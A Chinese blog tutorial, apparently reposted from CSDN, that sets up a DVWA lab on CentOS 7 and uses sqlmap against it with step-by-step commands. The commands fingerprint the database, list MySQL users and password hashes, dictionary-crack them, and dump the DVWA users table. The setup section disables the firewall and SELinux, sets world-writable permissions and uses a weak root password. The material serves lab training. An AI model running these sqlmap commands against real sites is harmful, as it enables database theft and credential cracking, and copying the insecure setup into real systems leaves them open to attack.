CentOS 下 使用sqlmap检测sql注入漏洞
原文链接:https://blog.csdn.net/weixin_41843699/article/details/99976743
环境
系统: CentOS 7
机器一:192.168.200.190 SQLmap
机器二:192.168.200.188 DVWA渗透测试演示系统
概念
1、sql注入概述
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库。
比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。例:12306.cn和csdn等网站帐号和密码的泄露,都有可能是sql注入导致的。
2、什么是sqlmap?
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。
官方网站下载http://sqlmap.org/
一、安装配置
1. SQLmap 安装(机器一)
1)安装 python 环境
1 2 3 4 | # yum -y install python # python -V Python 2.7.5 |
2)安装 sqlmap
1 2 3 4 | # tar -xzvf sqlmapproject-sqlmap-1.5.3-6-g1e8bf1c.tar.gz # mv sqlmapproject-sqlmap-1e8bf1c sqlmap # cd sqlmap # ./sqlmap.py |
3)创建 sqlmap 命令
1 2 | # ln -s /mnt/software/sqlmap/sqlmap.py /usr/bin/sqlmap # sqlmap -h |
2. DVWA演示系统安装
1)关闭防火墙 及 selinux
1 2 3 4 5 6 | # 不关闭,php文件通过httpd服务无法打开 # systemctl disable firewalld # systemctl stop firewalld # firewall-cmd --state not running # reboot |
# vim /etc/selinux/config # disabled - No SELinux policy is loaded. SELINUX=disabled # SELINUXTYPE= can take one of three two values: |
2)部署 LAMP环境
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | # 配置mirror # wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo # yum clean all # yum makecache # yum list # 安装服务 yum -y install httpd php php-mysql php-gd mariadb-server mariadb # 启动服务 # systemctl start httpd # systemctl start mariadb # 设置开机启动 # systemctl enable httpd # systemctl enable mariadb # 查看服务 # ps -ef | grep httpd # ps -ef | grep mariadb #查看端口 # netstat -antup | grep 80 # netstat -antup | grep 3306 |
3)测试 LAMP 环境搭建
1 2 3 | # vim /var/www/html/test.php <?php phpinfo(); ?> 访问测试 |
浏览器访问:http://192.168.200.188/test.php
4)配置 mysql 数据库
1 2 3 4 | # mysqladmin -uroot password “123456” #配置密码为123456 # mysql -uroot -p123456 #登录数据库 MariaDB[(none)]> quit |
5)配置DVWA
下载 dvwa,链接:https://github.com/digininja/DVWA
#安装unzip # yum -y install unzip #配置DVWA # unzip -d /var/www/html/ DVWA-master.zip # cd /var/www/html/ # mv DVWA-master/ DVWA # cd /var/www/html/DVWA/config/ # cp config.inc.php.dist config.inc.php # vim config.inc.php $_DVWA = array(); $_DVWA[ 'db_server' ] = '127.0.0.1' ; $_DVWA[ 'db_database' ] = 'dvwa' ; $_DVWA[ 'db_user' ] = 'root' ; $_DVWA[ 'db_password' ] = '123456' ; $_DVWA[ 'db_port' ] = '3306' ; |
6)部署 DVWA 网站系统
浏览器:http://192.168.200.188/DVWA/setup.php
修改:
# vim /etc/php.ini 改:815 allow_url_include = Off 为: allow_url_include = On # systemctl restart httpd
vim /var/www/html/DVWA/config/config.inc.php 改: 26 $_DVWA[ ‘recaptcha_public_key’ ] = ‘’; 27 $_DVWA[ ‘recaptcha_private_key’ ] = ‘’; 为: $_DVWA[ ‘recaptcha_public_key’ ] = ‘6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg’; $_DVWA[ ‘recaptcha_private_key’ ] = ‘6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ’;
修改完成后,刷新页面。
7)配置权限
# cd /var/www/html/DVWA/hackable # chmod 777 uploads # cd /var/www/html/DVWA/external/phpids/0.6/lib/IDS/tmp # chmod 777 phpids_log.txt # cd /var/www/html/DVWA # chmod 777 config |
修改完成后,刷新页面,看到 Writable的三个都是 Yes
再点击最下面的 "Create / Reset Database",会自动跳转到 http://192.168.200.188/DVWA/login.php
8)DVWA 默认密码
二、sqlmap 进行 sql 注入,并获取后台管理员的账号和密码
SQLmap语法:SQLmap命令选项被归类为目标(Target)选项、请求(Request)选项、优化、注入、检测、技巧(Techniques)、指纹、枚举等。
查看 sqlmap.py 帮助选项:
sqlmap常用参数:
-u : 指定目标URL,sql注入点
--cookie : 当前会话的cookie值
-b : 获取数据库类型 检索数据库管理系统的标识
( DBMS:Database Management System 数据库管理系统)
--current-db : 获取当前数据库
--current-user : 获取当前登录数据库使用的用户
1、枚举登录mysql数据库的用户名和密码
使用sqlmap之前需要得到当前会话的cookie等信息,用来在渗透过程中维持连接状态
cookie使用其复数形式成为cookies,指某些网站为了识别用户的身份,进行session跟踪,而存储在用户本地终端上的数据,这些数据通常都是加密的。
只要是登录过网站,就会在本地产生cookie,主要用于身份识别,进行session跟踪。
1)获取 cookie
使用 chrome浏览器,按 F12
2)将 DVWA 安全等级设置为 low
3)进入“SQL Injection”,输入数值,如 22,然后提交
4)获取当前的 cookie 值,在Headers 里面,找到 “Request URL”及“Cookie”值
5)获取数据库的用户名和当前正在使用的数据库名称
# 安装sqlmap 的机器一上 # sqlmap -u "http://192.168.200.188/DVWA/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=ge2nrjb08qgjbjn0eufh5i3fp5" -b --current-db --current-user |
回车后中间会有几个选项,每项含义如下
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] # 输入Y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n] # 输入n
GET parameter ‘id’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] # 输入n
2、使用命令枚举所有登录mysql数据库的用户名和密码hash值,后期可以对密码hash进行破解,生成明文密码
常用参数:
--string : 当查询可用时用来匹配页面中的字符串
--users : 枚举DBMS用户
--password : 枚举DBMS用户密码hash
# 安装sqlmap 的机器一上 # sqlmap -u "http://192.168.200.188/DVWA/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=ge2nrjb08qgjbjn0eufh5i3fp5" --string="Surname" --users --password |
选项:
do you want to store hashes to a temporary file for eventual further processing withother tools [y/N] #输入 y
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] #输入Y
what dictionary do you want to use?
[1] default dictionary file ‘/root/sqlmapproject-sqlmap-7eab1bc/txt/wordlist.zip’ (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
#直接回车,使用默认字典
do you want to use common password suffixes? (slow!) [y/N] #输入y
3、枚举DVWA库中的表
常用参数
-D : 要枚举的DBMS数据库
--tables : 枚举DBMS数据库中的数据表
# 安装 sqlmap 的机器上运行 # sqlmap -u "http://192.168.200.188/DVWA/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=ge2nrjb08qgjbjn0eufh5i3fp5" -D dvwa --tables |
4、获取dvwa库中users表的所有列名字
常用参数
-T : 要枚举的DBMS数据库表
--columns : 枚举DBMS数据库表中的所有列
# 安装 sqlmap 的机器上运行 # sqlmap -u "http://192.168.200.188/DVWA/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=ge2nrjb08qgjbjn0eufh5i3fp5" -D dvwa -T users --columns |
5、拖库,获取dvwa库中users表的所有列的名字
拖库本来是数据库领域的术语,指从数据库中导出数据。到了黑客攻击泛滥的今天,它被用来指网站遭到入侵后,黑客窃取其数据库。
常用参数:
-T : 要枚举的DBMS数据表
-C: 要枚举的DBMS数据表中的列
--dump : 转储DBMS数据表项
#安装 sqlmap 的机器一上运行 # sqlmap -u "http://192.168.200.188/DVWA/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=ge2nrjb08qgjbjn0eufh5i3fp5" -D dvwa -T users -C user,password --dump |
选项:
do you want to store hashes to a temporary file for eventual further processing withother tools [y/N] #输入y
do you want to crack them via a dictionary-based attack? [Y/n/q] #输入Y
what dictionary do you want to use? #
[1] default dictionary file ‘/root/sqlmapproject-sqlmap-7eab1bc/txt/wordlist.zip’ (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
#直接回车,使用默认字典
do you want to use common password suffixes? (slow!) [y/N] #输入y
查看导出的数据:
# cat /root/.local/share/sqlmap/output/192.168.200.188/dump/dvwa/users.csv |
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· 没有源码,如何修改代码逻辑?
· 分享4款.NET开源、免费、实用的商城系统
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· 上周热点回顾(2.24-3.2)